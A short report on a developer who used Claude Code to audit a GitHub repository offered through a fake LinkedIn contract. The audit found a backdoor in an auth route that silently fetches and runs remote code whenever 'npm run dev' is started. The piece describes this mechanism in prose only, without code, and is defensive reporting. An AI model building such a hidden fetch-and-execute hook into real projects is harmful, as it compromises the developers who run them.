Claude Code Identifies Malware Backdoor in GitHub Repo During Technical Audit

Claude Code was used to perform a security audit on a GitHub repository before execution, preventing a potential malware compromise. The developer was approached via LinkedIn about a contract role with an AI-powered Fintech startup and was invited to review their MVP on GitHub before a call.

Audit Prompt and Process

The developer opened the repository in VS Code and used this prompt with Claude Code:

"You are doing a technical due diligence audit of this codebase. Give me a brutally honest assessment. Check project completeness, AI/ML layer, database, authentication, backend services, frontend, code quality, and effort estimate. Be specific. Reference actual file names. Do not sugarcoat."

Critical Findings

Claude Code identified several security and integrity issues:

• Remote Code Execution Backdoor: Found in src/server/routes/auth.js. Every time npm run dev is executed, it silently fetches a remote URL and executes whatever code is returned with full system access (filesystem, network, processes). The execution happens silently with failure suppression.
• Fake Database Implementation: Users were stored in a plain array that resets on every restart instead of a real database.
• No AI/ML Functionality: The repository contained only hardcoded mock data with basic rule-based logic, despite README claims of machine learning, NLP, and predictive analytics.
• Frontend Deception: The frontend silently falls back to fake data on every API failure, making demos appear polished regardless of actual functionality.

Social Engineering Context

The attack targeted developers, freelancers, and agencies invited to review or contribute to repositories as part of hiring or contract processes. The social engineering was polished with professional LinkedIn messages, convincing README documentation, and attractive rates ($60–$100/hr remote contract). The repository appeared legitimate and was designed to encourage immediate execution.

Recommended Security Practices

• Never run an unknown repository without auditing it first
• Use Claude Code to scan repositories before execution (the audit took one prompt)
• Look for obfuscated execution patterns before running npm run dev
• Be suspicious of repositories where installation triggers automatic scripts

The developer reported that Claude Code is now a standard step in their onboarding process for every new client repository. After confronting the LinkedIn contact with the findings, the individual immediately blocked the developer.